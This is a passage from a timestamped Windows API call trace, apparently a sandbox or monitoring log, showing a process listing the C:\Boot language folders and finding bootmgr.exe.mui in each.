dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.343] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.343] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.343] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0039.343] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0039.344] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.344] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.344] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0039.344] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.344] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.344] CoTaskMemFree (pv=0x4fe370) [0039.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.344] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0039.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.345] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0039.345] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0039.345] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.345] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.345] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.345] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.345] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.345] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.346] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0039.346] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0039.346] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.346] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.346] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.346] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.346] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.346] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0039.346] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.346] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.346] CoTaskMemFree (pv=0x4fe370) [0039.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.347] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0039.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.347] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0039.347] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0039.347] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.386] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.386] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.386] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.386] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.387] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.387] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0039.387] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0039.387] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.387] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.387] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.387] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.387] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.387] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0039.387] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.387] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.387] CoTaskMemFree (pv=0x4fe370) [0039.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0039.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0039.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0039.388] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.388] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.388] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.388] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.388] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0039.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0039.389] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.389] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.389] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.389] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.389] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0039.389] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.389] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.389] CoTaskMemFree (pv=0x4fe370) [0039.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0039.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0039.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | 